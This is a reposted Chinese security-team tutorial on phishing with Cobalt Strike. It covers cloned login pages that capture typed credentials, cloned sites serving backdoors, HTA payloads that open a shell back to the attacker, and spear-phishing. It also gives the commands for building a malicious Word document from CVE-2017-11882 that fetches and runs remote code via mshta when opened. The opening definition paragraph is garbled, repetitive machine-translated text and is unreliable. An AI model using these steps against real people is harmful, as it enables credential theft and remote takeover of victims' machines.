转于:Komorebi Tide安全团队 2023-03-27 17:03 发表于山东
1、什么是社会工程学
它用于推广用户广泛的恶意活动。使用心理学来来破坏安全或诱骗社会工程诱骗信息。 肇事者首先调查社会目标的信息,以薄薄的背景背景进行攻击,然后进行攻击,然后攻击者攻击行动攻击和攻击行动可能受到攻击伤害。为激发者的信心,并为激发行动的动力,激发实践的动力或为资源提供新的动力。 2、社会工程攻击技术
以下是五种常见的社会工程攻击形式。 1、诱饵 2、恐吓软件 3、借口 4、钓鱼邮件 5、鱼叉式网络钓鱼 3、cobalt strike中的钓鱼
1、信息收集 打开System Profiler 可看到选择应用信息后,钓到了客户用的系统以及浏览器版本型号。 2、克隆模块和克隆网站进行键盘记录攻击 同样需要将连接发送给受害者。 打开Web Log,功能查看被攻击方登录页面的操作情况! 从web log中可以看到受害者输入了账号以及密码 3、克隆网站下载执行木马 打开Host File 克隆一个页面并提供一个后门文件… file:选择CS生成的shell,或者MSF也行! 确定URL下载的地址端口链接等情况! 然后回到方法2中!! 在打开Clone Site联动克隆模块,将克隆baidu页面,Attack攻击选择恶意链接页面进行钓鱼! 4、HTML Application
这个包生成一个运行负载的 HTML 应用程序;这种攻击需要用户的交互。CobaltStrike生成一个HTML应用hta,该应用中嵌入了一个Payload,通过URL下载这个文件到目标磁盘。运行后目标主机便可以返回会话给CS服务器。 生成Attack>Packages>HTML Application针对这个功能CS提供了三种生成方式,分别是 exe、powershell、vba。其中VBA方法需要目标系统上的Microsoft Office,在系统支持的情况下我们一般选择powershell,因为这种方式更加方便后续进行一些免杀的操作。通常结合host File(文件下载功能) 来实行钓鱼。这里以powershell生成hta文件为例。 可以看出就是一个powershell语句 利用利用CS的文件下载功能来建立一个web服务环境 当有主机访问该URL并进行完用户交互后,便会反弹shell给CS Server 5、Spear Phish
关于Spear phish 和发件人伪造的工具有很多个,比如gophish、SimpleEmailSpoofer、命令行工具swaks等,每个工具都有其特点,当然Cobalt Strike也有此功能。 Attack>Spear Phish点击“攻击-邮件钓鱼” 然后就可以发送钓鱼邮件 6、office宏钓鱼之CVE-2017-11882
关于简单的office钓鱼不再多介绍,请移步 http://wiki.tidesec.com/docs/SocialEngin/SocialEngin-1e17k0fp8s6qqCVE-2017-11882介绍CVE-2017-11882属于缓冲区溢出类型漏洞,产生漏洞原因于EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。 使用github上Ridter改进过的脚本 https://github.com/Ridter/CVE-2017-11882/使用该脚本,可以与Attack>Packages>HTML Application功能相结合,生成一个钓鱼文档使目标机上线 方法: python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc或者 python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc配合msf使用:首先要下载一个msf组件: https://github.com/0x09AL/CVE-2017-11882-metasploit下载的cve_2017_11882.rb文件复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下 cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/ 重新加载模块、使用命令search cve_2017_11882 查找对应的模块 然后生成相应的payload use exploit/windows/smb/cve_2017_11882
set lhost ****
set URIPATH test ## 设置URI的路径(注意这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径)
show options运行 exploit -j另开一个终端,把Command109b_CVE-2017-11882.py复制到kai liunx桌面,cd到桌面,运行命令 python Command109b_CVE-2017-11882.py -c "mshta http://10.211.55.9:8080/test" -o test2.doc 生成恶意doc文件 目标机打开即可上线。
|